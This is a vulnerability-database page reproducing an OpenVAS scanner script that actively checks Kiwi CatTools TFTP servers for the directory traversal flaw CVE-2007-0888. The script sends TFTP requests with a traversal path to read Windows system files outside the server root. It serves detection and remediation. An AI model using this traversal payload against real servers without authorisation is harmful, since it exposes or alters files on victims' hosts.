Lucene search
+L

Kiwi CatTools < 3.2.9 Directory Traversal - Active Check

🗓️ 22 Aug 2008 00:00:00Reported by Copyright (C) 2008 Ferdy RiphagenType 
openvas
 openvas
🔗 plugins.openvas.org👁 24 Views

Kiwi CatTools < 3.2.9 Directory Traversal vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-0888
12 Feb 200723:00
cve
cvelist
Cvelist
CVE-2007-0888
12 Feb 200723:00
cvelist
exploitdb
Exploit DB
Kiwi CatTools TFTP 3.2.8 - Directory Traversal
27 Feb 200700:00
exploitdb
euvd
EUVD
EUVD-2007-0884
7 Oct 202500:30
euvd
nessus
Tenable Nessus
Kiwi CatTools < 3.2.9 TFTP Server Traversal Arbitrary File Manipulation
1 Mar 200700:00
nessus
kaspersky
Kaspersky
KLA10239 Multiple vulnerabilities in KIWI CatTools
12 Feb 200700:00
kaspersky
nvd
NVD
CVE-2007-0888
12 Feb 200723:28
nvd
openvas
OpenVAS
Kiwi CatTools < 3.2.9 Directory Traversal - Active Check
24 Oct 200800:00
openvas
prion
Prion
Directory traversal
12 Feb 200723:28
prion
securityvulns
securityvulns
Kiwi CatTools TFTO directory traversal
27 Feb 200700:00
securityvulns
# SPDX-FileCopyrightText: 2008 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.200001");
  script_version("2026-03-17T05:57:28+0000");
  script_tag(name:"last_modification", value:"2026-03-17 05:57:28 +0000 (Tue, 17 Mar 2026)");
  script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2007-0888");
  script_name("Kiwi CatTools < 3.2.9 Directory Traversal - Active Check");
  script_category(ACT_ATTACK);
  script_family("Remote file access");
  script_copyright("Copyright (C) 2008 Ferdy Riphagen");
  script_dependencies("tftpd_detect.nasl", "global_settings.nasl", "tftpd_backdoor.nasl",
                      "os_detection.nasl");
  script_require_udp_ports("Services/udp/tftp", 69);
  script_mandatory_keys("tftp/detected", "Host/runs_windows");
  script_exclude_keys("keys/TARGET_IS_IPV6");

  script_xref(name:"URL", value:"http://www.kiwisyslog.com/kb/idx/5/178/article/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/22490");
  script_xref(name:"URL", value:"https://marc.info/?l=bugtraq&m=117097429127488&w=2");

  script_tag(name:"solution", value:"Upgrade to Kiwi CatTools version 3.2.9 or later.");

  script_tag(name:"summary", value:"The remote tftpd server is affected by a directory traversal vulnerability.");

  script_tag(name:"insight", value:"Kiwi CatTools is installed on the remote host. The version installed is vulnerable
  to a directory traversal attack by using '[char]//..' sequences in the path.");

  script_tag(name:"impact", value:"A attacker may be able to read and write files outside the tftp root.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

if(TARGET_IS_IPV6())
  exit(0);

include("host_details.inc");
include("os_func.inc");
include("traversal_func.inc");
include("port_service_func.inc");
include("tftp.inc");

port = service_get_port(default:69, proto:"tftp", ipproto:"udp");

if(!tftp_has_reliable_get(port:port))
  exit(0);

files = traversal_files("windows");

foreach file(keys(files)) {

  get = tftp_get(port:port, path:"z//..//..//..//..//..//" + files[file]);
  if(!get)
    continue;

  if(egrep(pattern:file, string:get, icase:TRUE)) {
    report = string("The " + files[file] + " file contains:\n", get);
    security_message(port:port, data:report, proto:"udp");
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.05129
24